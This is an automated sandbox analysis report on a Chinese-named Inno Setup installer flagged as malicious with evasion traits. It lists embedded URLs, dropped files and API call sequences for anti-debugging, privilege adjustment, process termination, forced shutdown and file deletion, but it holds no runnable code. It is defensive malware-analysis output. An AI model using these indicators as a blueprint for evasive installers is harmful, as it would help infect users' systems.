Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0A
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0C
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0H
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0I
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0X
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://www.digicert.com/CPS0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-0C2B4.tmp.6.drString found in binary or memory: http://www.metalinker.org/
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-0C2B4.tmp.6.drString found in binary or memory: http://www.metalinker.org/basic_string::_M_construct
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-0C2B4.tmp.6.drString found in binary or memory: https://aria2.github.io/
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-0C2B4.tmp.6.drString found in binary or memory: https://aria2.github.io/Usage:
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-0C2B4.tmp.6.drString found in binary or memory: https://github.com/aria2/aria2/issues
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-0C2B4.tmp.6.drString found in binary or memory: https://github.com/aria2/aria2/issuesReport
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1796173002.0000000002C60000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1796644119.000000007F1EB000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000000.1798850894.0000000000BE1000.00000020.00000001.01000000.00000004.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000000.1861362559.000000000086D000.00000020.00000001.01000000.00000008.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.0.dr, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.5.drString found in binary or memory: https://www.innosetup.com/
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1796173002.0000000002C60000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1796644119.000000007F1EB000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000000.1798850894.0000000000BE1000.00000020.00000001.01000000.00000004.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000000.1861362559.000000000086D000.00000020.00000001.01000000.00000008.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.0.dr, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.5.drString found in binary or memory: https://www.remobjects.com/ps

Operating System Destruction

barindex
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess information set: 01 00 00 00 Jump to behavior

System Summary

barindex
Source: update.vac.1.drStatic PE information: section name: .j)q
Source: update.vac.6.drStatic PE information: section name: .j)q
Source: updat4.vac.6.drStatic PE information: section name: .j)q
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA13F30 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle,6_2_6CA13F30
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6C893886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6C893886
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6C893C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6C893C62
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6C893D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6C893D18
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6C893D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6C893D62
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6C8939CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6C8939CF
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6C893A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6C893A6A
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA14B80 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,6_2_6CA14B80
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6C891950: CreateFileA,DeviceIoControl,CloseHandle,6_2_6C891950
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6C894754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor,6_2_6C894754
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6C8947546_2_6C894754
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA158636_2_6CA15863
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA109006_2_6CA10900
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA74CE06_2_6CA74CE0
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CAC1D506_2_6CAC1D50
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA46EA16_2_6CA46EA1
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CAC7E806_2_6CAC7E80
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA60EC96_2_6CA60EC9
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CABC8106_2_6CABC810
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CAC79F06_2_6CAC79F0
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA469726_2_6CA46972
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CAD2AA06_2_6CAD2AA0
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CABBAD06_2_6CABBAD0
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CABDA506_2_6CABDA50
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA4EBCA6_2_6CA4EBCA
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA5EB666_2_6CA5EB66
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA6340A6_2_6CA6340A
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CACD5C06_2_6CACD5C0
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CAC76E06_2_6CAC76E0
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA4A7CF6_2_6CA4A7CF
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CAE77006_2_6CAE7700
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CAD17506_2_6CAD1750
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_001C81EC9_2_001C81EC
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0019E00A9_2_0019E00A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_002081C09_2_002081C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_002182409_2_00218240
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_002022E09_2_002022E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_002223009_2_00222300
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0021C3C09_2_0021C3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_001EE49F9_2_001EE49F
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_002104C89_2_002104C8
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_002025F09_2_002025F0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_001F86509_2_001F8650
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_001FA6A09_2_001FA6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_001F66D09_2_001F66D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_001FC9509_2_001FC950
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_001D09439_2_001D0943
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0021E9909_2_0021E990
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00202A809_2_00202A80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_001DAB119_2_001DAB11
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_001F8C209_2_001F8C20
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00206CE09_2_00206CE0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00210E009_2_00210E00
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00214EA09_2_00214EA0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0020D0899_2_0020D089
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_001E10AC9_2_001E10AC
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_002111209_2_00211120
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_001EB1219_2_001EB121
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_001FB1809_2_001FB180
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_002051809_2_00205180
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_001FD1D09_2_001FD1D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_002191C09_2_002191C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_002172009_2_00217200
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0021D2C09_2_0021D2C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0020F3A09_2_0020F3A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_001853CF9_2_001853CF
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0021F3C09_2_0021F3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_001E53F39_2_001E53F3
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_001AB3E49_2_001AB3E4
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0020F4209_2_0020F420
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_001F74109_2_001F7410
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0021D4709_2_0021D470
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_001CD4969_2_001CD496
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_002154D09_2_002154D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_002135309_2_00213530
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_001FF5009_2_001FF500
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0022351A9_2_0022351A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_001815729_2_00181572
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_002115509_2_00211550
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0021F5999_2_0021F599
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_002236019_2_00223601
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_001D96529_2_001D9652
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0020D6A09_2_0020D6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_001997669_2_00199766
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_001897CA9_2_001897CA
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_002177C09_2_002177C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_001AF8E09_2_001AF8E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_001FF9109_2_001FF910
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0021D9E09_2_0021D9E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00181AA19_2_00181AA1
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0019BAC99_2_0019BAC9
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00207AF09_2_00207AF0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_001D3AEF9_2_001D3AEF
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00207C509_2_00207C50
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0019BC929_2_0019BC92
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_001FFDF09_2_001FFDF0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00205E809_2_00205E80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00205F809_2_00205F80
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess token adjusted: SecurityJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: String function: 6CA47240 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: String function: 6CAE4F10 appears 415 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 00181E40 appears 83 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 0021FB10 appears 720 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 001828E3 appears 34 times
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.5.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeStatic PE information: Number of sections : 11 > 10
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.5.drStatic PE information: Number of sections : 11 > 10
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.0.drStatic PE information: Number of sections : 11 > 10
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1796173002.0000000002D7E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameSRClient.exe vs #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1796644119.000000007F4EA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameSRClient.exe vs #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000000.1794126992.0000000000D59000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameSRClient.exe vs #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeBinary or memory string: OriginalFileNameSRClient.exe vs #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.12.drBinary string: \Device\TfSysMon
Source: tProtect.dll.12.drBinary string: \Device\TfKbMonPWLCache
Source: classification engineClassification label: mal80.evad.winEXE@126/32@0/0
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA14B80 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,6_2_6CA14B80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00189313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,9_2_00189313
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00193D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,9_2_00193D66
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00189252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,9_2_00189252
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA14050 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,Process32NextW,6_2_6CA14050
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpFile created: C:\Program Files (x86)\Windows NT\is-CS4GB.tmpJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6768:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5928:120:WilError_03
